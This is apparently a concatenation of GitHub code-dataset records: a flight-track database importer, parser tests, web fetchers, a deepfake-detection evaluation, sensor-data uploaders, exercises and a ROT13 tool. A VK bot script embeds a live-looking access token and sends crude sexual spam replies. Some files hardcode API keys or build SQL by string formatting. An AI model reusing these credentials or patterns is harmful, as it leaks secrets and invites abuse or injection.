data=None, path=None, seg_time_diff=15, min_point_distance=200, registration='', submission_method='manual', operator_code=None, aircraft_type=None, silent=False, force_import=False, ssl_cert_path=None, engine=None, force_registration=False, ignore_duplicate_flights=False, **kwargs):\r\n\r\n\r\n    if type(data) == gpd.geodataframe.GeoDataFrame:\r\n        gdf = data.copy()\r\n    elif path:\r\n        gdf = format_track(path, seg_time_diff=seg_time_diff, min_point_distance=min_point_distance,\r\n                           registration=registration, submission_method=submission_method,\r\n                           operator_code=operator_code, aircraft_type=aircraft_type, force_registration=force_registration)\r\n    else:\r\n        raise ValueError('Either data (a geodataframe) or path (to a valid track file) must be given')\r\n\r\n    if not engine and connection_txt:\r\n        engine = db_utils.connect_db(connection_txt)\r\n    elif not engine:\r\n        raise ValueError('Either an SQLAlchemy Engine (from create_engine()) or connection_txt must be given')\r\n\r\n    # Recalculate landing time and duration here in case there were edits that changed these\r\n    # Also drop any segments with only one vertex \r\n    gdf = calculate_duration(gdf)\\\r\n        .loc[gdf.duration_hrs > 0]\r\n\r\n    # get columns from DB tables\r\n    flight_columns = db_utils.get_db_columns('flights', engine)\r\n    
point_columns = db_utils.get_db_columns('flight_points', engine)\r\n line_columns = db_utils.get_db_columns('flight_lines', engine)\r\n ''' ############ add submission table #############'''\r\n\r\n # separate flights, points, and lines\r\n flights = gdf[[c for c in flight_columns if c in gdf]].drop_duplicates()\r\n \r\n flights['end_datetime'] = gdf.groupby('flight_id').ak_datetime.max().values\r\n # if coming from web app, this should already be in the data so don't overwrite\r\n #if 'submitter' not in flights.columns:\r\n # flights['submitter'] = os.getlogin()\r\n if 'track_editor' not in flights.columns:\r\n flights['track_editor'] = os.getlogin()#flights.submitter\r\n if path and 'source_file' not in flights.columns:\r\n flights['source_file'] = os.path.join(ARCHIVE_DIR, os.path.basename(path))\r\n if not len(flights):\r\n raise ValueError('No flight segments found in this file.')\r\n\r\n points = gdf.copy()\r\n points['geom'] = gdf.geometry.apply(lambda g: WKTElement(g.wkt, srid=4326))\r\n points.drop(columns=points.columns[~points.columns.isin(point_columns)], inplace=True)\r\n\r\n line_geom = gdf.groupby('flight_id').geometry.apply(lambda g: shapely_LineString(g.to_list()))\r\n lines = gpd.GeoDataFrame(flights.set_index('flight_id'), geometry=line_geom)\r\n lines['geom'] = lines.geometry.apply(lambda g: WKTElement(g.wkt, srid=4326))\r\n lines['flight_id'] = lines.index\r\n lines.drop(columns=lines.columns[~lines.columns.isin(line_columns)], inplace=True)\r\n lines.index.name = None\r\n\r\n with engine.connect() as conn, conn.begin():\r\n\r\n # Insert only new flights. Check for new flights by looking for flight points from the same registration number\r\n # that are within the start and end times of each flight segment (since an aircraft can't be in 2 locations\r\n # at the same time).\r\n existing_flight_info = []\r\n existing_flight_ids = []\r\n for _, f in flights.iterrows():\r\n matching_flights = check_duplicate_flights(f.registration, conn, f.departure_datetime, f.end_datetime)\r\n existing_flight_info.extend([(m.registration, m.departure_datetime) for _, m in matching_flights.iterrows()])\r\n existing_flight_ids.extend(matching_flights.flight_id)\r\n if len(existing_flight_info) and not force_import and not ignore_duplicate_flights:\r\n existing_str = '\\n\\t-'.join(['%s: %s' % f for f in existing_flight_info])\r\n raise ValueError('The file {path} contains flight segments that already exist in the database as'\r\n ' indicated by the following registration and departure times:\\n\\t-{existing_flights}'\r\n '\\nEither delete these flight segments from the database or run this script again with'\r\n ' the --force_import flag (ONLY USE THIS FLAG IF YOU KNOW WHAT YOU\\'RE DOING).'\r\n .format(path=path, existing_flights=existing_str))\r\n\r\n new_flights = flights.loc[~flights.flight_id.isin(existing_flight_ids)]\r\n new_flights.drop(columns='end_datetime')\\\r\n .to_sql('flights', conn, if_exists='append', index=False)\r\n\r\n # Warn the user if any of the flights already exist\r\n n_flights = len(flights)\r\n n_new_flights = len(new_flights)\r\n if n_new_flights == 0:\r\n raise ValueError('No new flight segments were inserted from this file because they all already exist in'\r\n ' the database.')\r\n if n_flights != n_new_flights:\r\n warnings.warn('For the file {path}, the following {existing} of {total} flight segments already exist:'\r\n '\\n\\t- {ids}'\r\n .format(path=path,\r\n existing=n_flights - n_new_flights,\r\n total=n_flights,\r\n 
ids='\\n\\t-'.join(existing_flight_ids)\r\n                                  )\r\n                          )\r\n\r\n        # Get the numeric IDs of the flights that were just inserted and insert the points and lines matching those\r\n        # flight IDs that were just inserted\r\n        flight_ids = pd.read_sql(\"SELECT id, flight_id FROM flights WHERE flight_id IN ('%s')\"\r\n                                 % \"', '\".join(flights.flight_id),\r\n                                 conn)\r\n        points = points.merge(flight_ids, on='flight_id')\r\n        points.loc[~points.flight_id.isin(existing_flight_ids)]\\\r\n            .drop('flight_id', axis=1) \\\r\n            .rename(columns={'id': 'flight_id'})\\\r\n            .to_sql('flight_points',\r\n                    conn,\r\n                    if_exists='append',\r\n                    index=False,\r\n                    dtype={'geom': Geometry('POINT Z', srid=4326)})\r\n        lines = lines.merge(flight_ids, on='flight_id')\r\n        lines.loc[~lines.flight_id.isin(existing_flight_ids)]\\\r\n            .drop('flight_id', axis=1) \\\r\n            .rename(columns={'id': 'flight_id'})\\\r\n            .to_sql('flight_lines',\r\n                    conn,\r\n                    if_exists='append',\r\n                    index=False,\r\n                    dtype={'geom': Geometry('LineStringZ', srid=4326)})\r\n\r\n        # INSERT info about this aircraft if it doesn't already exist. If it does, UPDATE it if necessary.\r\n        # Mostly disabled because this happens now as a separate scheduled task; only runs if ssl_cert_path is given\r\n        if ssl_cert_path:\r\n            ainfo.update_aircraft_info(conn, registration, ssl_cert_path)\r\n\r\n    # VACUUM and ANALYZE clean up unused space and recalculate statistics to improve spatial query performance. Attempt\r\n    # to run these commands on both spatial tables, but if they fail, just warn the user since it's not that big of\r\n    # a deal\r\n    try:\r\n        with engine.execution_options(isolation_level='AUTOCOMMIT').connect() as conn:\r\n            conn.execute('VACUUM ANALYZE flight_points;')\r\n            conn.execute('VACUUM ANALYZE flight_lines;')\r\n    except:\r\n        warnings.warn(\"Unable to VACUUM and ANALYZE geometry tables. You should connect to the database and manually\"\r\n                      \" run 'VACUUM ANALYZE flight_points;' and 'VACUUM ANALYZE flight_lines;' to ensure queries are as\"\r\n                      \" efficient as possible\")\r\n\r\n    # Archive the data file\r\n    if not os.path.isdir(ARCHIVE_DIR):\r\n        try:\r\n            os.mkdir(ARCHIVE_DIR)\r\n        except:\r\n            pass\r\n    if os.path.isdir(os.path.dirname(path)):\r\n        try:\r\n            shutil.copy(path, ARCHIVE_DIR)\r\n            os.remove(path)\r\n        except Exception as e:\r\n            warnings.warn('Data successfully imported, but could not copy track files because %s. 
You will have to '\r\n                          'manually copy and paste this file to %s' % (e, ARCHIVE_DIR))\r\n\r\n    if not silent:\r\n        sys.stdout.write('%d flight %s imported:\\n\\t-%s' % (len(flights), 'tracks' if len(flights) > 1 else 'track', '\\n\\t-'.join(flight_ids.flight_id)))\r\n        sys.stdout.flush()\r\n\r\n\r\ndef print_operator_codes(connection_txt):\r\n    \"\"\"Helper function to display operator codes in the console for the user\"\"\"\r\n\r\n    engine = db_utils.connect_db(connection_txt)\r\n    operator_codes = db_utils.get_lookup_table(engine, 'operators', index_col='name', value_col='code')\r\n    operator_code_str = '\\n\\t-'.join(sorted(['%s: %s' % operator for operator in operator_codes.items()]))\r\n\r\n    print('Operator code options:\\n\\t-%s' % operator_code_str)\r\n\r\n\r\ndef main(connection_txt, track_path, seg_time_diff=15, min_point_distance=200, registration='', submission_method='manual', operator_code=None, aircraft_type=None, email_credentials_txt=None, log_file=None, force_import=False, ssl_cert_path=None):\r\n\r\n    sys.stdout.write(\"Log file for %s: %s\\n\" % (__file__, datetime.now().strftime('%H:%M:%S %m/%d/%Y')))\r\n    sys.stdout.write('Command: python %s\\n\\n' % subprocess.list2cmdline(sys.argv))\r\n    sys.stdout.flush()\r\n\r\n    seg_time_diff = int(seg_time_diff)\r\n    min_point_distance = int(min_point_distance)\r\n\r\n    if email_credentials_txt:\r\n        sender, password = process_emails.get_email_credentials(email_credentials_txt)\r\n        server = smtplib.SMTP('smtp.gmail.com', 587)\r\n        server.starttls()\r\n        server.ehlo()\r\n        server.login(sender, password)\r\n\r\n    try:\r\n        import_data(connection_txt, path=track_path, seg_time_diff=seg_time_diff, min_point_distance=min_point_distance, registration=registration, submission_method=submission_method, operator_code=operator_code,\r\n                    aircraft_type=aircraft_type, force_import=force_import, ssl_cert_path=ssl_cert_path)\r\n    except Exception as e:\r\n        if email_credentials_txt:\r\n            message_body = 'There was a problem with the attached file: %s' % os.path.basename(track_path)\r\n            subject = 'Error occurred while processing %s' % os.path.basename(track_path)\r\n            process_emails.send_email(message_body, subject, sender, ERROR_EMAIL_ADDRESSES, server, attachments=[track_path, log_file])\r\n            server.close()\r\n\r\n        # Still raise the error so it's logged\r\n        raise e\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    args = get_cl_args(__doc__)\r\n    \r\n    if args['show_operators']:\r\n        sys.exit(print_operator_codes(args['connection_txt']))\r\n    else:\r\n        del args['show_operators']\r\n        sys.exit(main(**args))\r\n\r\n","repo_name":"smHooper/flightsdb","sub_path":"scripts/import_track.py","file_name":"import_track.py","file_ext":"py","file_size_in_byte":52427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"1912742644","text":"from spack.package import *\n\n\nclass PyHepdataLib(PythonPackage):\n    \"\"\"Library for getting your data into HEPData\"\"\"\n\n    homepage = \"https://github.com/HEPData/hepdata_lib\"\n    # PyPI archives are broken: missing requirement.txt file\n    # pypi = \"hepdata_lib/hepdata_lib-0.9.0.tar.gz\"\n    url = \"https://github.com/HEPData/hepdata_lib/archive/refs/tags/v0.9.0.tar.gz\"\n\n    version(\"0.10.1\", sha256=\"71c635963883c51e7be18e03d80bfe42c5de350852b01010e3e45cbd1bff7a81\")\n    version(\"0.9.0\", sha256=\"c9238e45c603d7c061ed670cf197ff03ad9d370ab50419b6916fda2cd86d6150\")\n\n    depends_on(\"py-setuptools\", type=\"build\")\n    depends_on(\"root+python\", type=(\"build\", \"run\"))\n    depends_on(\"py-numpy\", type=(\"build\", 
\"run\"))\n depends_on(\"py-pyyaml@5:\", type=(\"build\", \"run\"))\n depends_on(\"py-future\", type=(\"build\", \"run\"))\n depends_on(\"py-six\", type=(\"build\", \"run\"))\n depends_on(\"py-pytest-runner\", type=\"build\")\n depends_on(\"py-pytest-cov\", type=\"build\")\n depends_on(\"py-hepdata-validator@0.3.2:\", when=\"@0.10.1:\", type=(\"build\", \"run\"))\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/py-hepdata-lib/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"2114799155","text":"from pathlib import Path\nimport os\nimport pytest\nimport json\nfrom endf_parserpy.endf_parser import BasicEndfParser\nfrom endf_parserpy.debugging_utils import smart_is_equal, compare_objects\nfrom endf_parserpy.user_tools import sanitize_fieldname_types\n\n\n@pytest.fixture(scope=\"module\")\ndef myBasicEndfParser(ignore_zero_mismatch, ignore_number_mismatch,\n ignore_varspec_mismatch, fuzzy_matching, blank_as_zero,\n abuse_signpos, skip_intzero, prefer_noexp,\n accept_spaces):\n return BasicEndfParser(ignore_zero_mismatch=ignore_zero_mismatch,\n ignore_number_mismatch=ignore_number_mismatch,\n ignore_varspec_mismatch=ignore_varspec_mismatch,\n fuzzy_matching=fuzzy_matching,\n blank_as_zero=blank_as_zero,\n abuse_signpos=abuse_signpos,\n skip_intzero=skip_intzero,\n prefer_noexp=prefer_noexp,\n accept_spaces=accept_spaces)\n\n\ndef test_endf_parserpy_never_fails(endf_file, myBasicEndfParser, mf_sel):\n try:\n endfdic = myBasicEndfParser.parsefile(endf_file, include=mf_sel)\n except Exception as exc:\n filename = os.path.basename(endf_file)\n pytest.fail(f'BasicEndfParser failed on file {filename} with exception {exc}')\n\n\ndef test_endf_read_write_read_roundtrip_preserves_content(endf_file, tmp_path, myBasicEndfParser, mf_sel):\n endf_dic = myBasicEndfParser.parsefile(endf_file, include=mf_sel)\n outfile = tmp_path / os.path.basename(endf_file)\n myBasicEndfParser.writefile(outfile, endf_dic)\n endf_dic2 = myBasicEndfParser.parsefile(outfile, include=mf_sel)\n compare_objects(endf_dic, endf_dic2, atol=1e-10, rtol=1e-10)\n # also check if same number of lines of original input and output.\n # with include=tuple() sections are not parsed but taken verbatim as string.\n # original files sometimes contain additional whitespace at the end of line\n # or lack the NS line number field so we cut the strings for comparison after 75 characters\n raw_endf = myBasicEndfParser.parsefile(endf_file, include=tuple())\n raw_endf2 = myBasicEndfParser.parsefile(outfile, include=tuple())\n compare_objects(raw_endf, raw_endf2, strlen_only=True, rstrcut=75)\n\n\ndef test_endf_json_endf_roundtrip_preserves_content(endf_file, tmp_path, myBasicEndfParser, mf_sel):\n endf_dic = myBasicEndfParser.parsefile(endf_file, include=mf_sel)\n jsonstr = json.dumps(endf_dic, ensure_ascii=False)\n endf_dic2 = json.loads(jsonstr)\n sanitize_fieldname_types(endf_dic2)\n compare_objects(endf_dic, endf_dic2, atol=1e-10, rtol=1e-10)\n","repo_name":"IAEA-NDS/endf-parserpy","sub_path":"tests/test_endf_parser.py","file_name":"test_endf_parser.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"73"} +{"seq_id":"73431869035","text":"import logging\nimport requests\nfrom bs4 import BeautifulSoup\n\nlogger = logging.getLogger(__name__)\n\n\nclass NicovideoFetcher:\n\n @classmethod\n def 
fetch_playlist_and_latest_movie(cls, playlist_id: str) -> dict:\n d = {}\n try:\n # get playlist info\n url = f\"http://www.nicovideo.jp/mylist/{playlist_id}?rss=2.0&numbers=1&sort=1\"\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'xml')\n channel_item = soup.find('channel')\n d['playlist_title'] = channel_item.title.text\n d['playlist_url'] = channel_item.link.text\n\n # get latest movie info of playlist\n latest_item = soup.find('item')\n d['latest_movie_title'] = latest_item.title.text\n d['latest_movie_url'] = latest_item.link.text\n except Exception as e:\n logger.debug(e)\n logger.debug(f\"playlist_id:{playlist_id}\")\n finally:\n logger.debug(d)\n return d\n\n","repo_name":"uitspitss/ml2lm","sub_path":"plugins/utils/nicovideo_fetcher.py","file_name":"nicovideo_fetcher.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"18334926182","text":"import keras\nimport tensorflow as tf\nfrom keras.models import Model, load_model\nfrom keras.layers import *\nimport numpy as np\nfrom keras import backend as K\nimport os\nimport plotly.offline as py\nimport plotly.graph_objects as go\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '1'\n\nclass X_plus_Layer(Layer):\n def __init__(self, **kwargs):\n super(X_plus_Layer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.alpha = self.add_weight(name='alpha', initializer='ones', trainable=True)\n self.beta = self.add_weight(name='beta', initializer='zeros', trainable=True)\n super(X_plus_Layer, self).build(input_shape)\n\n def call(self, inpt_x):\n x, A = inpt_x\n x_diag = x\n for i in range(25-1):\n x_diag = K.concatenate([x_diag, x], axis=2)\n x_diag_channals = x_diag\n x_diag_channals = K.expand_dims(x_diag, axis=3)\n x_diag = K.expand_dims(x_diag, axis=3)\n for i in range(3-1):\n x_diag_channals = K.concatenate([x_diag_channals, x_diag], axis=3)\n \n x_mask = x\n width = 25\n for w in range(width-1):\n x_mask = K.concatenate([x_mask, x], axis=2)\n x_mask_channals = x_mask\n x_mask_channals = K.expand_dims(x_mask, axis=3)\n x_mask = K.expand_dims(x_mask, axis=3)\n for i in range(3-1):\n x_mask_channals = K.concatenate([x_mask_channals, x_mask], axis=3)\n\n a_part = multiply([x_diag, A])\n a_part = self.alpha * a_part\n\n b_part = self.beta * x_mask_channals\n\n ans = Add()([a_part, b_part])\n return ans\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0][0], 300, 25, 3)\n\ndeeprhythm_path = \"/DATASET/__saika_data/analysis/model/ablation_model/sa_pa_ta_ma_e2e_0.9775.h5\"\nmodel = load_model(deeprhythm_path, custom_objects={'multiply':multiply, 'Add':Add, 'X_plus_Layer':X_plus_Layer})\n\ndata_meso_dir = \"/DATASET/__saika_data/dfdc/model_result/Meso/\"\ndata_stmap_dir = \"/DATASET/__saika_data/dfdc/stmap/\"\n\nprint(\"DeepRhythm ... 
\")\n\nmeso_data = []\nstmap_data = []\ny_data = []\nfor methname in [\"method_A\", \"method_B\", \"original_videos\"]:\n\n if methname in [\"method_A\", \"method_B\"]:\n y_lbl = 1\n else:\n y_lbl = 0\n\n mesomethpath = data_meso_dir + methname + '/'\n stmethpath = data_stmap_dir + methname + '/'\n\n vidlist = os.listdir(mesomethpath)\n vidlist.sort()\n for vidname in vidlist:\n meso = np.load(mesomethpath + vidname)\n meso = np.resize(meso, (300, 1))\n stmap = np.load(stmethpath + vidname[:-4] + \".avi.npy\")\n\n meso_data.append(meso)\n stmap_data.append(stmap)\n y_data.append(y_lbl)\n\nmeso_data = np.array(meso_data)\nstmap_data = np.array(stmap_data)\ny_data = np.array(y_data)\n\nscore, acc = model.evaluate([stmap_data, meso_data], y_data,\n batch_size=32)\nprint(\"DeepRhythm: {}\".format(acc))\n\nmeso_data = []\nstmap_data = []\ny_data = []","repo_name":"tsingqguo/deeprhythm","sub_path":"evaluate_DeepRhythm.py","file_name":"evaluate_DeepRhythm.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"23001783122","text":"import requests\nimport xml.etree.ElementTree as etree\nfrom datetime import datetime\n\n\ndef test():\n print('Agritronics...')\n\n \ndef GetLastData(network_id,node_id,io_number):\n script_path = '/ws/get.php?' \n time=''\n url = 'http://'+server+script_path+'appkey='+appkey+'&p='\\\n + network_id+','+node_id+','+io_number\n print(url)\n page = requests.get(url)\n root = etree.fromstring(page.content)\n io=root.find('IO')\n if io is None :\n return time\n\n time=io.find('LastIODateTime').text \n value=io.find('LastValue').text\n \n return time,value\n\ndef GetDailyData(network_id,node_id,io_number,date):\n server = 'agritronics.nstda.or.th'\n appkey = '0c5a295bd8c07a080d5306'\n script_path = '/ws/get.php?'\n times=[]\n values=[]\n url = 'http://'+server+script_path+'appkey='+appkey+'&p='\\\n + network_id+','+node_id+','+io_number+','+date\n print(url)\n page = requests.get(url)\n root = etree.fromstring(page.content)\n io=root.find('IO')\n if io is None :\n return times,values\n for d in io.findall('Data'):\n t=d.find('IODateTime').text\n v=float(d.find('Value').text)\n times.append(t)\n values.append(v)\n return times,values\n\n #4010,A,20/12/04,14:05:00,7,100,0.0\ndef PrepareDataForUpload(time_s,value_s) :\n node_id='4010'\n log_type='A'\n io_number='100'\n data_str=''\n i=0\n for ts_str in time_s :\n ts_dt = datetime.strptime(ts_str, '%Y-%m-%d %H:%M:%S')\n date_str=ts_dt.strftime('%y/%m/%d')\n time_str=ts_dt.strftime('%H:%M:%S')\n line_str = F\"{node_id},{log_type},{date_str},{time_str},7,{io_number},{value_s[i]}\\n\" \n #print(line_str)\n data_str=F\"{data_str}{line_str}\"\n i=i+1\n\n return data_str\n\n\n\ndef PrepareDataForUpload(node_id,io_number,time_s,*n) :\n log_type='A'\n data_str=''\n i=0\n for ts_str in time_s :\n ts_dt = datetime.strptime(ts_str, '%Y-%m-%d %H:%M:%S')\n date_str=ts_dt.strftime('%y/%m/%d')\n time_str=ts_dt.strftime('%H:%M:%S')\n line_str = F\"{node_id},{log_type},{date_str},{time_str},7,{io_number}\"\n for value_s in n :\n line_str+=F\",{value_s[i]}\" \n line_str+=\"\\n\"\n #print(line_str)\n data_str=F\"{data_str}{line_str}\"\n i=i+1\n\n return data_str\n\n\n\n#curl -F uploadedfile=@data.txt -F network=DURIAN-01 http://agritronics.nstda.or.th/webpost0606/log_webpost.php\ndef UploadData(network_id,data_str):\n url= 'http://agritronics.nstda.or.th/webpost0606/log_webpost.php'\n\n files={\n 'uploadedfile': ('data.txt', data_str),\n }\n 
data={\n 'network' : (network_id)\n }\n \n res = requests.post(url,files=files,data=data)\n #print(res.request.headers)\n #print(res.request.body)\n print(res.text)\n return\n\ndef UploadPicture(network_id,node_id,io_number,time_stamp,file) :\n url='http://agritronics.nstda.or.th/webpost0606/log_imgcap.php'\n \n ts_str=time_stamp.strftime('%Y%m%d%H%M%S')\n \n file_name = F\"{ts_str}__{network_id}__{node_id}__{io_number}.jpg\"\n print(file_name)\n files={\n 'uploadedfile':(file_name, file)\n }\n data={\n 'network' : (network_id),\n 'filedatetime' : (ts_str)\n }\n \n #res = requests.post(url,files=files,data=data)\n #print(res.request.headers)\n #print(res.request.body)\n #print(res.text)\n\n return\n","repo_name":"khongpan/DurianIrrigation","sub_path":"lib/agritronics.py","file_name":"agritronics.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70752432555","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Yngve Mardal Moe\"\n__email__ = \"yngve.m.moe@gmail.com\"\n\n\ndef squares_by_comp(n):\n return [k**2 for k in range(n) if k % 3 == 1]\n\n\ndef squares_by_loop(n):\n data = []\n for k in range(n):\n if k % 3 == 1:\n data.append(k**2)\n return data\n\n\nif __name__ == '__main__':\n if squares_by_loop(20) != squares_by_comp(20):\n print('ERROR!')\n","repo_name":"yngvem/INF200-2019-Exercises","sub_path":"src/YOUR_NAME_ex/ex01/comp_to_loop.py","file_name":"comp_to_loop.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"73"} +{"seq_id":"32825762653","text":"import vk_api\nimport time\n\ntoken = '00fe30963f90c3b59b84d70826591d579aaaad1e3fa5e81d3ad520da0abf4659dfd0d3879e67ef9c6a219'\nvk = vk_api.VkApi(token=token)\nvk._auth_token()\n\n\ndef hello():\n person_name = messages[\"profiles\"][0]['first_name']\n print(person_name)\n vk.method(\"messages.send\", {\"peer_id\": person_id, \"message\": person_name})\n\n\nwhile True:\n try:\n messages = vk.method('messages.getConversations', {'offset': 0, 'count': 20, 'filter': 'unanswered', \"extended\":1})\n if messages['count'] >= 1:\n person_id = messages['items'][0]['last_message']['from_id']\n body_of_message = messages['items'][0]['last_message']['text']\n\n if body_of_message.lower() == 'привет':\n hello()\n else:\n vk.method(\"messages.send\", {\"peer_id\": person_id, \"message\": 'ОТСОСУ ЗА 100, пиши в лс'})\n\n\n\n except Exception as E:\n time.sleep(1)\n","repo_name":"PankillerG/Public_Projects","sub_path":"Programming/PycharmProjects/untitled/апрол.py","file_name":"апрол.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"7203883726","text":"# Popularity Contest\n\n# Edge cases\n# N (2≤N≤1000), the number of your friends,\n# M (0≤M≤N(N−1)/2), the number of friendships.\n# 1 ≤ a ≠ b ≤ N, denoting that the a’th and b’th of your friends are friends.\n\n# Input Section: friends and number of friendships\nM, N = 0, 0\ncondition_met = False\nwhile not condition_met:\n first_line = input().split(' ')\n N = int(first_line[0])\n M = int(first_line[1])\n if 2 <= N <= 1000 and 0 <= M <= (N*(N-1)/2):\n condition_met = True\n\n# Creating popularity_score array\npopularity_score = [0] * N\n\n# Collecting pairs\nfor x in range(M):\n pair = input().split(' ')\n a = int(pair[0])\n b = int(pair[1])\n if 1 <= a <= N and 1 <= b <= N and a != b:\n popularity_score[a-1] += 
1\n        popularity_score[b-1] += 1\n\n# Print output in a single line\nfor x in range(1, N+1):\n    print(popularity_score[x-1] - x, end=\" \")\n","repo_name":"alexandreclalex/CompProg","sub_path":"lab1/popularity-contest/PopularityContest.py","file_name":"PopularityContest.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
{"seq_id":"74476850794","text":"# -*- coding: utf-8 -*-\n\"\"\"Algorithm for shortest path of knight.\"\"\"\nfrom breath_first_search.chessboard import Chessboard\nfrom breath_first_search.exeptions import InvalidMove\nfrom breath_first_search.component_system import log_function_call\nfrom collections import deque\nimport logging\nimport sys\n\nlogging.basicConfig(level=logging.DEBUG)\nLOGGER = logging.getLogger(__name__)\n\n\nclass ShortestPathKnight(Chessboard):\n    \"\"\"Class for the shortest path of knight.\"\"\"\n\n    def __init__(self, file) -> None:\n        \"\"\"Constructor of ShortestPathKnight.\n\n        :param file: file with chessboard\n        :rtype: None\n        \"\"\"\n        Chessboard.__init__(self, file=file)\n        self.knight_moves: list = [(2, 1), (1, 2), (-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, -2), (2, -1)]\n        self.size: int = len(self.chessboard)\n\n    @log_function_call\n    def breath_first_search(self) -> str:\n        \"\"\"Method for breadth-first search.\n\n        :return: number of steps to reach end position\n        :rtype: str\n        \"\"\"\n        queue = deque([self.start])\n        visited = {tuple(self.start)}  # track visited squares so each cell is enqueued at most once\n        self.chessboard[self.start[0]][self.start[1]] = 0\n\n        while queue:\n            row, col = queue.popleft()\n\n            if (row, col) == self.end:\n                return self.chessboard[row][col]\n\n            for d_row, d_col in self.knight_moves:\n                new_row, new_col = row + d_row, col + d_col\n\n                if self._is_valid_move(new_row, new_col) and (new_row, new_col) not in visited:\n                    visited.add((new_row, new_col))\n                    self.chessboard[new_row][new_col] = self.chessboard[row][col] + 1\n                    queue.append((new_row, new_col))\n        else:\n            LOGGER.error(\"No path found\")\n            sys.exit(1)\n\n    def _is_valid_move(self, row: int, col: int) -> bool:\n        \"\"\"Helper method that checks if the move is valid.\n\n        :param row: row of chessboard\n        :param col: column of chessboard\n        :return: True if move is valid\n        :return: False if move is not valid\n        :rtype: bool\n        \"\"\"\n        try:\n            return 0 <= row < self.size and 0 <= col < self.size\n\n        except InvalidMove:\n            LOGGER.error(\"Invalid move\")\n            sys.exit(1)\n","repo_name":"Yggdrasill501/knights_path","sub_path":"breath_first_search/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"}
{"seq_id":"6820580245","text":"#*********************FUNCTIONS******************************\nimport string\n\ndef ROT13(string):\n    \"\"\"\n    DOCUMENTATION DOWN BELOW\n    Function for encoding a string with the rot13 algorithm.\n    \n    The function argument 'string' is the source string\n    \n    return gives back the resulting string \n    \"\"\"\n\n    def roter(ch):\n        i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.find(ch)\n        if i != -1:\n            return 'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm'[i]\n        else:\n            return ch\n\n    return \"\".join(map(roter, string))\n\n\t\n#EXAMPLES \n#print('\\n',ROT13('sbbone rttfcnz')) #foobar eggspam\n#print('\\n',ROT13('Hayrff rkcyvpvgyl fvyraprq')) #Unless explicitly silenced\n#print('\\n',ROT13('Gung jnl znl abg or boivbhf ng svefg hayrff lbh\\'er Qhgpu'),'\\n') #That way may not be obvious at first unless you're Dutch\n\ndef inputChekcer(userInput = \" \", type = 
str):\n\t\"\"\"\n\tDOCUMENTATION DOWN BELOW\n\tFunction that validates input by casting it to the given type \n\t\"\"\"\n\twhile (1):\n\t\ttry:\n\t\t\tinp = type(input(userInput))\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"\\n\\t\\t\\t\\tInput error\")\n\treturn inp\n\ndef en_de_crypt_file():\n\tspase = \"\\n\\n\"\n\tjustFile = None\n\ttry:\n\t\tfilePath = inputChekcer(\"\\tinput the path : \",str)\n\t\tjustFile = open(filePath, \"r\")\n\t\tmessage = ROT13(justFile.read())\n\t\tjustFile = open(filePath, \"w\")\n\t\tjustFile.write(ROT13(message)) #original message\n\t\tjustFile.write(spase)\n\t\tjustFile.write(message) #re-encoded message\n\t\tprint ('\\n\\t\\t\\tDecoding welldone!\\n\\n\\n')\n\texcept OSError:\n\t\tprint(\"\\tfailed opening the file for reading\")\n\tfinally: \n\t\tif justFile is not None:\n\t\t\tjustFile.close()\n\t\n\t\n#***********************PROGRAMM*******************************\n \nif __name__ == \"__main__\":\n\timport test_ROT13\n\tassert test_ROT13.test_vice_versa(ROT13)\n\t\n\tprint(\"\\n\\n\\t\\t\\t1) encrypt/decrypt file\")\n\tprint(\"\\t\\t\\t2) encrypt/decrypt string\")\n\tprint(\"\\t\\t\\t3) exit\")\n\n\twhile (1):\n\t\tchecker = inputChekcer( \"\"\" input: \"\"\", str)\n\t\tif checker == \"1\":\n\t\t\ten_de_crypt_file()\n\t\telif checker == \"2\":\n\t\t\tprint(ROT13(inputChekcer(\"\\tInput the string: \",str)))\n\t\telif checker == \"3\":\n\t\t\texit()\n\t\telse:\n\t\t\tprint(\"\\tInput error. Repeat once again\") \n","repo_name":"herzenuni/sem3-rot13-311017-vonkuptschino","sub_path":"ROT13.py","file_name":"ROT13.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
